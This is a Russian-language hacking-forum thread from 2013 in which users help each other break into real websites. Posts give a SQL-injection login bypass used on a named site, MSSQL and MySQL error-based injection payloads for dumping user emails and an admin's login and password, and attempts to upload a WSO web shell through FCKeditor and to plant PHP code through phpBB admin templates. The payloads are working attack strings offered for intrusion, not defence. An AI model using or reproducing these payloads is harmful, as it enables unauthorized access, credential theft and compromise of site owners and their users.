ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.03.2013, 18:31
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
сорь, может не в тему но, слили БД сайта, админку найти не могу, в БД таюлици имеют префикс xpanel - в гугле ничего не могу найти про этот двиг, офф сайт уже давно в оффе, может кто что знает про етот двиг? где там админку можно найти?
|
|
|
|
08.03.2013, 00:09
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Always
Always said:
http://adjump.ru/
пост
logsecurecash=1&login_name=[SQL inj]&login_pass=111111&x=31&y=13
перепробовал различные варианты...никак.
logsecurecash=1&login_name= ' or 1#&login_pass=111111&x=31&y=13
Вы зашли как: advaweb
Баланс: 10 руб.
|
|
|
08.03.2013, 00:13
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от cat1vo
cat1vo said:
logsecurecash=1&login_name=
' or 1#
&login_pass=111111&x=31&y=13
Вы зашли как:
advaweb
Баланс: 10 руб.
Стыдно, спасибо
|
|
|
|
09.03.2013, 04:35
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033
Репутация:
8
|
|
Сообщение от pharm_all
pharm_all said:
Mssql
Надо вывести name lastname email
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(email as nvarchar) from member where id=4)--
вывод: name:email@email.com
Как вывести еще lastname в одном запросе , если делаю
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(
lastname
as nvarchar+char(0x7а)+cast(email as nvarchar) from member where id=4)--
Не выводит 3 значение :
name:lastname:email@email.com
Как вывести одним запросом 3 значения?
Потому что скобку забыл в запросе
(select top 1 cast(name as nvarchar)+char(0x7a)+cast(lastname as nvarchar )+char(0x7а)+cast(email as nvarchar) from member where id=4)--
|
|
|
|
09.03.2013, 11:11
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Подскажите по поводу FCKeditor 2.5.1 Build 17566
txt файлы спокойно льются, а вот php никак нехочет пробывал:
1) Через /php/upload.php?Type=Media
2) Грузил txt указывал в Current Folder: wso.php%00
3) Пробывал %00 в url-decode, так же пробывал wso2.php%00.txt
Что посоветуете? других дыр нет есть еще CKEditor 3.2.1
Двиг: Powered by cc Engine (китайский двиг)
P.S>.htaccess так же не грузит
|
|
|
|
09.03.2013, 14:34
|
|
Познающий
Регистрация: 25.10.2007
Сообщений: 46
Провел на форуме:
318186
Репутация:
2
|
|
Подскажите в чем может быть проблема
Сообственно пытаюсь лить шелл через админку phpbb 3 через стили
Включаю выполнение php кода в шаблонах, иду в шаблоны faq_body.html
впиливаю код
Иду в forum.com/faq.php?c=phpinfo(); пхпинфо не выводится = \
Подскажите почему может не выполнятся пхпкод
права в админке полные, мб можно еще какнить залить?
|
|
|
|
09.03.2013, 14:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
6020
Репутация:
0
|
|
Сообщение от cat1vo
cat1vo said:
Что за бред, думать надо хоть не много головой, инъекция в куках, а Вы хотите их отключить? Тут дело в другом, человек совершенно не умеет этим всем пользоваться и работать с тем, что нашел ему сканер, да и по всей видимости, сам не понимает, что хочет.
Все отлично работает, запрос переделал, мне так удобнее...
Код:
Code:
Host: game.*****.ru
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Cookie: login=demodemo; pass="or(1)group+by(mid((select+concat_ws(0x3a,version(),schema())),rand(0)|0))having(avg(0))or"
Duplicate entry '
5.5.29-1-log:s10parl
' for key 'group_key'
Версия -
5.5.29-1-log
Названия Базы Данных -
s10parl
"or(1)group+by(mid((
СЮДА ВСТАВЛЯЙТЕ СВОЙ ЗАПРОС
),rand(0)|0))having(avg(0))or"
Дальше делайте сами, если не знаете как, на форуме есть мануал -
ССЫЛКА
З.Ы. Для работы можете пользоваться тем же Acunetix, Burp Suite, Firefox (Live HTTP Headers) или HTTPAnalyzer (я предпочитаю его)! пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Сообщение от None
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' at line 1
Сообщение от None
Table 'panel.users' doesn't exist
Сообщение от None
Table 'panel.***' doesn't exist
Подскажите где взять список запросов?
|
|
|
|
09.03.2013, 15:13
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от panfilov1991
panfilov1991 said:
пытаюсь отправить запросы для вывода данных хотя бы юзеров.
то и дело выходят ошибки :
Подскажите где взять список запросов?
а какой запрос вы делайте? покажите.
|
|
|
|
09.03.2013, 15:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
6020
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
а какой запрос вы делайте? покажите.
Сообщение от None
"or(1)group+by(mid((SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin' --''),rand(0)|0))having(avg(0))or"
ошибка :
Сообщение от None
Table 'panel.users' doesn't exist
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
|
|
|
|
09.03.2013, 15:44
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от panfilov1991
panfilov1991 said:
ошибка :
Как можно вывести названия таблиц?
Очень надо вывести логин и пасс админа
Сообщение от None
"or(1)group+by(mid((SELECT concat_ws(0x3a,login,pass) FROM users WHERE login=0x41646D696E limit 0,1),rand(0)|0))having(avg(0))or"
там где значение 0x41646D696E это Admin, вам бы мануалы по mysql почитать!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
